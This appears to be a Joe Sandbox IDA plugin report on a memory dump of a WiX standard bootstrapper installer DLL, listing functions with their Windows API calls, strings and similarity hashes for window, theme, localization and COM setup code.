Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: MessageSend$ErrorLast$AutoClientCompareCompleteCreateRectStringWindow
String ID: +$Button$Riched20.dll$Static$ThemeHyperLink$thmutil.cpp
API String ID: 3320771329-3047721881
Opcode ID: 65b9e1174d665211da5cf96194dc3b799326a5b11bd2a4e17039e3c3a5c1b31f
Instruction ID: 7a81809d3a7564c6167adceb4f62c2c94fc8aee26be4e82309fc49f3c6732442
Opcode Fuzzy Hash: 65b9e1174d665211da5cf96194dc3b799326a5b11bd2a4e17039e3c3a5c1b31f
Instruction Fuzzy Hash: 3DF16070B04A05DFDB21CFA9C981AAEBBF5FF45310F20491AE562A6A90D731E581CF53

Function 6C9C9CD4 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 151
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,?,?,?,6C9C9ED5,00000000,00000000,00000000,?,6C9C4070,?), ref: 6C9C9CF2
GetLastError.KERNEL32(?,?,?,6C9C9ED5,00000000,00000000,00000000,?,6C9C4070,?), ref: 6C9C9CFE
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 6C9C9D62
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 6C9C9D6E
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 6C9C9D78
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 6C9C9D83
CoCreateInstance.OLE32(6C9DD10C,00000000,00000001,6C9D536C,00000000,?,?,?,6C9C9ED5,00000000,00000000,00000000,?,6C9C4070,?), ref: 6C9C9DBD
ExitProcess.KERNEL32 ref: 6C9C9E72

Strings

Wow64RevertWow64FsRedirection, xrefs: 6C9C9D7A
Wow64EnableWow64FsRedirection, xrefs: 6C9C9D70
IsWow64Process, xrefs: 6C9C9D5C
kernel32.dll, xrefs: 6C9C9CDE
xmlutil.cpp, xrefs: 6C9C9D28
Wow64DisableWow64FsRedirection, xrefs: 6C9C9D68

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 5e278f5bb9406fe27ee0e3867ccbf873b305bf8fa6601143454837599e64d57b
Instruction ID: 1a73bf70fc09dc2e60dff7e4e871345e8b03d66ac6367212c4ad79d004a06d18
Opcode Fuzzy Hash: 5e278f5bb9406fe27ee0e3867ccbf873b305bf8fa6601143454837599e64d57b
Instruction Fuzzy Hash: D7517C71B00219ABEB00DFA5CC44BAEBBB8EF55719F224569F510FB680D771DA40CB92

Function 6C9C3E4A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 159
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,00000000,?,00000000), ref: 6C9C3E93
LoadIconW.USER32(00000000,00000001), ref: 6C9C3E9F
LoadCursorW.USER32(00000000,00007F00), ref: 6C9C3EBE
RegisterClassW.USER32(?), ref: 6C9C3EEC
GetLastError.KERNEL32 ref: 6C9C3EF7
GetCursorPos.USER32(?), ref: 6C9C3F40
MonitorFromPoint.USER32(?,?,00000002), ref: 6C9C3F52
GetMonitorInfoW.USER32(00000000,?), ref: 6C9C3F68
CreateWindowExW.USER32(00000000,6C9D59AC,?,00000001,?,?,?,?,00000000,00000000,?,?), ref: 6C9C3FC3
GetLastError.KERNEL32 ref: 6C9C3FD3

Strings

WixStandardBootstrapperApplication.cpp, xrefs: 6C9C3FF8
(, xrefs: 6C9C3F61
WixStdBA, xrefs: 6C9C3EE5

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CursorErrorLastLoadMonitor$ClassCreateFromHandleIconInfoModulePointRegisterWindow
String ID: ($WixStandardBootstrapperApplication.cpp$WixStdBA
API String ID: 844225009-4208313422
Opcode ID: 6290a1f39a55e6a47b550fcbd209ad30e348b3472fbe358a9363eb3144fc157a
Instruction ID: 357dd5f46be658428b965888f0204ee434b676aa36de54f5df990f0e7214c158
Opcode Fuzzy Hash: 6290a1f39a55e6a47b550fcbd209ad30e348b3472fbe358a9363eb3144fc157a
Instruction Fuzzy Hash: 34518C72B01605AFEB10CFB9C949BAABBF8FF49314F114528E606EB650D770E904CB52

Function 6C9C4017 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 6C9C402F
CoUninitialize.OLE32 ref: 6C9C4192

Part of subcall function 6C9C1141: EnterCriticalSection.KERNEL32(?,75C0B390,?,6C9C4137), ref: 6C9C1149
Part of subcall function 6C9C1141: LeaveCriticalSection.KERNEL32(?), ref: 6C9C1150

Strings

Failed to initialize theme manager., xrefs: 6C9C405F
Failed to initialize COM., xrefs: 6C9C403E
Failed to initialize data in bootstrapper application., xrefs: 6C9C4076
Failed to create main window., xrefs: 6C9C4094
Unexpected return value from message pump., xrefs: 6C9C4121

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeaveUninitialize
String ID: Failed to create main window.$Failed to initialize COM.$Failed to initialize data in bootstrapper application.$Failed to initialize theme manager.$Unexpected return value from message pump.
API String ID: 3418922982-138392756
Opcode ID: 215cc3d2bf1baf4931478dbff2f601b79283c85e90f32f1c81d5d4192033eaa9
Instruction ID: 9a232f372eafae8ff22fb39ae3fac7724ea18ca958b7c0adf198c95e9f9dbcb0
Opcode Fuzzy Hash: 215cc3d2bf1baf4931478dbff2f601b79283c85e90f32f1c81d5d4192033eaa9
Instruction Fuzzy Hash: 8341D771304B01ABDB109A74CC44BBF72BDEFB6318F100929E542E7A41EB74EA459B63

Function 6C9C8FB9 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162
keyboardwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,00000000,?,?,6C9C3D98,00000000,?,?,?,?), ref: 6C9C9053
GetDlgItem.USER32(?,?), ref: 6C9C90A1
_memmove.LIBCMT ref: 6C9C90DA
GetKeyState.USER32(00000010), ref: 6C9C912F
GetNextDlgTabItem.USER32(?,?,00000000), ref: 6C9C9143
SetFocus.USER32(00000000,?,6C9C3D98,00000000,?,?,?,?), ref: 6C9C914A
GetUpdateRect.USER32(?,00000000,00000000), ref: 6C9C9176
BeginPaint.USER32(?,?,?,6C9C3D98,00000000,?,?,?,?), ref: 6C9C918A
EndPaint.USER32(?,?,?,?,?,6C9C3D98,00000000,?,?,?,?), ref: 6C9C91A4

Part of subcall function 6C9C7905: SetTextColor.GDI32(?,?), ref: 6C9C794F
Part of subcall function 6C9C7905: SetBkColor.GDI32(?,?), ref: 6C9C7960

Strings

open, xrefs: 6C9C90F2

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ColorItemPaint$BeginFocusNextProcRectStateTextUpdateWindow_memmove
String ID: open
API String ID: 3701977547-2758837156
Opcode ID: dcef6e119e561ea2394ac00ed1979e169a5b2f7c3fb5f5c665299ed4fef70657
Instruction ID: ea25ee7805327998695def355460e3b9f4b07c3c9e3f40b6cf09b089275617c9
Opcode Fuzzy Hash: dcef6e119e561ea2394ac00ed1979e169a5b2f7c3fb5f5c665299ed4fef70657
Instruction Fuzzy Hash: 3951D071B04109EEDB118F248C84AFE77BCEB1A35CF224569F615E2950C775DA888B63

Function 6C9C7017 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C9C993C: CoInitialize.OLE32(00000000), ref: 6C9C994B
Part of subcall function 6C9C993C: InterlockedIncrement.KERNEL32(6C9DD11C), ref: 6C9C9968
Part of subcall function 6C9C993C: CLSIDFromProgID.OLE32(Msxml2.DOMDocument,6C9DD10C,?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C9983
Part of subcall function 6C9C993C: CLSIDFromProgID.OLE32(MSXML.DOMDocument,6C9DD10C,?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C998F

LoadCursorA.USER32(00000000,00007F89), ref: 6C9C7046
GetClassInfoW.USER32(00000000,Button,?), ref: 6C9C705C
GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C7066
RegisterClassW.USER32(?), ref: 6C9C70A0
GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C70AB
InitCommonControlsEx.COMCTL32(?,6C9DC1F0,6C9DD0F4,6C9DD0EC,?,?,?,?,?,?,?,6C9C4057,?), ref: 6C9C711A

Strings

ThemeHyperLink, xrefs: 6C9C7099
thmutil.cpp, xrefs: 6C9C70D0
Button, xrefs: 6C9C7055

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: ClassErrorFromLastProg$CommonControlsCursorIncrementInfoInitInitializeInterlockedLoadRegister
String ID: Button$ThemeHyperLink$thmutil.cpp
API String ID: 3830294179-4220003992
Opcode ID: e12dd8b2df446114c1de16cb8405d6e1d98da7cd47b3591816da4c12b8d37591
Instruction ID: d3a13b7bf71707a3b915f372d52bdad0b73f944b2d6991d0aa685958f80727f7
Opcode Fuzzy Hash: e12dd8b2df446114c1de16cb8405d6e1d98da7cd47b3591816da4c12b8d37591
Instruction Fuzzy Hash: DA21F373B45A16EBEB10ABA4CC05B9A7BB8FB01714F114124E905FB740EB74E6448BE3

Function 6C9C2C60 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 382
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxW.USER32(?,?,?,00000031), ref: 6C9C2CE0
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9C2CFC

Strings

The requested operation is successful. Changes will not be effective until the system is rebooted., xrefs: 6C9C2CC9, 6C9C2CD9
InstallFolder, xrefs: 6C9C2E7C
WixBundleElevated, xrefs: 6C9C2D48
LaunchTarget, xrefs: 6C9C2F28
0x%08x - %ls, xrefs: 6C9C2FCF

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Message$Post
String ID: 0x%08x - %ls$InstallFolder$LaunchTarget$The requested operation is successful. Changes will not be effective until the system is rebooted.$WixBundleElevated
API String ID: 3307098700-823001171
Opcode ID: 6e78e78f7003cd8bace3ddd0d0552303ed2fde36fa818fcc7ff2742a59b1f5bf
Instruction ID: 703290a17dee127dc698ec0ca55da6a004dc3a86d01cbc407079f313d459eaf0
Opcode Fuzzy Hash: 6e78e78f7003cd8bace3ddd0d0552303ed2fde36fa818fcc7ff2742a59b1f5bf
Instruction Fuzzy Hash: 9DE19071B01B09EFDB218FA0CD84BEAB7B9FF61308F104829E665A6950D770DA54CB53

Function 6C9C7B4A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C9C9FA8: SysAllocString.OLEAUT32(?), ref: 6C9C9FBB
Part of subcall function 6C9C9FA8: VariantInit.OLEAUT32(?), ref: 6C9C9FC7
Part of subcall function 6C9C9FA8: VariantClear.OLEAUT32(?), ref: 6C9CA03B
Part of subcall function 6C9C9FA8: SysFreeString.OLEAUT32(00000000), ref: 6C9CA046

__fassign.LIBCMT ref: 6C9C7B87

Part of subcall function 6C9CCA9D: wcstoxl.LIBCMT ref: 6C9CCAAD

Part of subcall function 6C9CAAC0: GlobalAlloc.KERNEL32(00000002,?,?,00000000,6C9C7B9F,?,00000000,753CE860,6C9C7B9F,00000000,?,00000000,00000000,00000000,00000000), ref: 6C9CAAF8
Part of subcall function 6C9CAAC0: GetLastError.KERNEL32 ref: 6C9CAB07
Part of subcall function 6C9CAAC0: GlobalFree.KERNEL32(00000000), ref: 6C9CAC28

SysFreeString.OLEAUT32(00000000), ref: 6C9C7BA7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,00000000,FF000000,00000000,ImageResource,00000000,00000000,00000000,00000000), ref: 6C9C7C12
SysFreeString.OLEAUT32(00000000), ref: 6C9C7C64

Strings

thmutil.cpp, xrefs: 6C9C7C34
ImageResource, xrefs: 6C9C7B57
ImageFile, xrefs: 6C9C7BB7

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: FreeString$AllocGlobalVariant$BitmapClearCreateErrorFromGdipInitLast__fassignwcstoxl
String ID: ImageFile$ImageResource$thmutil.cpp
API String ID: 3426277259-1357958357
Opcode ID: f09289e030c1cd289c753b18cabcf31af1f0266090864c98629f81e9140d5796
Instruction ID: 5fa52ee3f7c2d3090995153a951f5e6d4e37f90b8b573ebf924ddfbe85ea3f87
Opcode Fuzzy Hash: f09289e030c1cd289c753b18cabcf31af1f0266090864c98629f81e9140d5796
Instruction Fuzzy Hash: 21316031E40518FBCF11AFA5CD408EDBB79EF64214F228591E821B3A10D732DE509B53

Function 6C9C76CB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000024), ref: 6C9C76E5
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,08000000,00000000,?,6C9DC028,?,?,00000000,?,?,6C9DC028,00000024), ref: 6C9C771A
GetLastError.KERNEL32(?,00000000,?,?,6C9DC028,00000024), ref: 6C9C7727
SendMessageW.USER32(00000024,00000435,00000000,00000024), ref: 6C9C7778
SendMessageW.USER32(00000024,00000449,00000002,?), ref: 6C9C779A
FindCloseChangeNotification.KERNELBASE(00000000,?,6C9DC028,?,?,00000000,?,?,6C9DC028,00000024), ref: 6C9C77B4

Strings

thmutil.cpp, xrefs: 6C9C774C

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: MessageSend$ChangeCloseCreateErrorFileFindItemLastNotification
String ID: thmutil.cpp
API String ID: 2864319522-2961750086
Opcode ID: 08490ad2d87bff737fefc4108f3f0adff7accb07fe6b73cf1ba52ebd6669abd1
Instruction ID: 6f020034d7000d7f20615453f3bccd724e169abc428a2bac18b1854f78281413
Opcode Fuzzy Hash: 08490ad2d87bff737fefc4108f3f0adff7accb07fe6b73cf1ba52ebd6669abd1
Instruction Fuzzy Hash: 4621D072A00608BFEF115FA8CC45EDE7B79EF95724F204521FA21B7190E330DA109B92

Function 6C9C1A1A Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadLocale.KERNEL32(?,00000000,?,00000000,mbapreq.wxl,?,00000000,00000000), ref: 6C9C1A8C

Strings

Failed to load loc file from path: %ls, xrefs: 6C9C1A79
thm.wxl, xrefs: 6C9C1A35, 6C9C1A41, 6C9C1A53
Failed to localize confirm close message: %ls, xrefs: 6C9C1ABB
#(loc.ConfirmCancelMessage), xrefs: 6C9C1A94
mbapreq.wxl, xrefs: 6C9C1A2E
Failed to probe for loc file: %ls in path: %ls, xrefs: 6C9C1A54

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: LocaleThread
String ID: #(loc.ConfirmCancelMessage)$Failed to load loc file from path: %ls$Failed to localize confirm close message: %ls$Failed to probe for loc file: %ls in path: %ls$mbapreq.wxl$thm.wxl
API String ID: 635194068-2078304381
Opcode ID: a4195432c52f86628f4d274afe5cde1cf09fc96fa0372e15adc64dfd99a808c6
Instruction ID: 2e9ceba3942bc29b85bb80833e6aba783ea48a1ac8e9551ca3c88155f85be373
Opcode Fuzzy Hash: a4195432c52f86628f4d274afe5cde1cf09fc96fa0372e15adc64dfd99a808c6
Instruction Fuzzy Hash: 2A11E473A01914FBDB129A95CC40FCE76BC9F62368F154650F900BAA10D731EE14D79B

Function 6C9C1F45 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35
comregistrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(6C9D7CE4,00000000,00000017,6C9D6734,?,?,6C9C4087,?), ref: 6C9C1F5D
RegisterWindowMessageW.USER32(TaskbarButtonCreated), ref: 6C9C1F7A
GetLastError.KERNEL32 ref: 6C9C1F8A

Strings

Failed to get TaskbarButtonCreated message. Continuing., xrefs: 6C9C1FA7
TaskbarButtonCreated, xrefs: 6C9C1F75
Failed to create ITaskbarList3. Continuing., xrefs: 6C9C1F6E

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: CreateErrorInstanceLastMessageRegisterWindow
String ID: Failed to create ITaskbarList3. Continuing.$Failed to get TaskbarButtonCreated message. Continuing.$TaskbarButtonCreated
API String ID: 1594109290-758521254
Opcode ID: 55928ae77b38f02487b9518ff9c20ed94f33c61ac920bf3c944e7470f6c2cdb7
Instruction ID: cd43629f84ec4e370cdc2bdd30ff95838fe1a44037e685d98f5ee8efd5f4e41e
Opcode Fuzzy Hash: 55928ae77b38f02487b9518ff9c20ed94f33c61ac920bf3c944e7470f6c2cdb7
Instruction Fuzzy Hash: ABF0E271749A02AEF7000660DD08BC53AE8DB42318F21492AF941F4980E728F2948B1B

Function 6C9C3B21 Relevance: 7.7, APIs: 5, Instructions: 196
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 6C9C3B2C
SetWindowLongW.USER32(?,000000EB,00000000), ref: 6C9C3B7B
PostQuitMessage.USER32(00000000), ref: 6C9C3C16
SetWindowLongW.USER32(?,000000EB,00000000), ref: 6C9C3C60
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9C3D75

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: LongWindow$Message$PostQuitSend
String ID:
API String ID: 1409866109-0
Opcode ID: ca036ce6a89e65765b8dd17654836360264f8a0a527218b5c58d9bb33098c6bb
Instruction ID: 4ebe23571fbc2eb5f4f1b517666becf03ded918bbc1d62604b294cb2cff50867
Opcode Fuzzy Hash: ca036ce6a89e65765b8dd17654836360264f8a0a527218b5c58d9bb33098c6bb
Instruction Fuzzy Hash: 4151E8343C9E51B7DB150A398808BEE7A25FF62B28F500209FD2597ED0CB34DA5186D7

Function 6C9C5A48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNEL32(mbapreq.wxl,?,?,?,?,?,6C9C1A4A,00000000,mbapreq.wxl,?,00000000,00000000), ref: 6C9C5AA5
GetSystemDefaultUILanguage.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 6C9C5AF4

Part of subcall function 6C9CA815: _memset.LIBCMT ref: 6C9CA840
Part of subcall function 6C9CA815: FindFirstFileW.KERNELBASE(00000000,?,%u\%ls,00000000,00000000), ref: 6C9CA850
Part of subcall function 6C9CA815: FindClose.KERNELBASE(00000000), ref: 6C9CA85C

Strings

%u\%ls, xrefs: 6C9C5AB2, 6C9C5ABA, 6C9C5B04
mbapreq.wxl, xrefs: 6C9C5A54

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: DefaultFindLanguage$CloseFileFirstSystemUser_memset
String ID: %u\%ls$mbapreq.wxl
API String ID: 1176375609-3698500817
Opcode ID: 7322e496c63da6371c03782dc3d60f98b7095e780a1a280dc72674c55b256680
Instruction ID: 27da325e21c1b312828efbb4b8d69f45ca1d39a6d3652b81d0d9e7cac302e356
Opcode Fuzzy Hash: 7322e496c63da6371c03782dc3d60f98b7095e780a1a280dc72674c55b256680
Instruction Fuzzy Hash: B8313D72A00029BFDF11AEE4CD808EDBBBDEB34254B1541A5F911A7914D731CF54AB53

Function 6C9C9E79 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C9C9E93
SysAllocString.OLEAUT32(00000000), ref: 6C9C9EA3
VariantClear.OLEAUT32(00000000), ref: 6C9C9F82

Strings

xmlutil.cpp, xrefs: 6C9C9EBB

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: c4d223a9accf9a67465a95a67cc7d4aefa9b5600d5b054ef6f1e60ac24849530
Instruction ID: 02eb489a3809d663237bfc86226ff5758e242178667b9d0cd69a1259bc4c21fc
Opcode Fuzzy Hash: c4d223a9accf9a67465a95a67cc7d4aefa9b5600d5b054ef6f1e60ac24849530
Instruction Fuzzy Hash: 0641A272B04219AFCB00DFA9C888E9E77BDEF45358F1645A5F816DB611DA30DD40CB62

Function 6C9C62CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000024), ref: 6C9C62DD
SetWindowTextW.USER32(00000000,6C9DC028), ref: 6C9C62EB
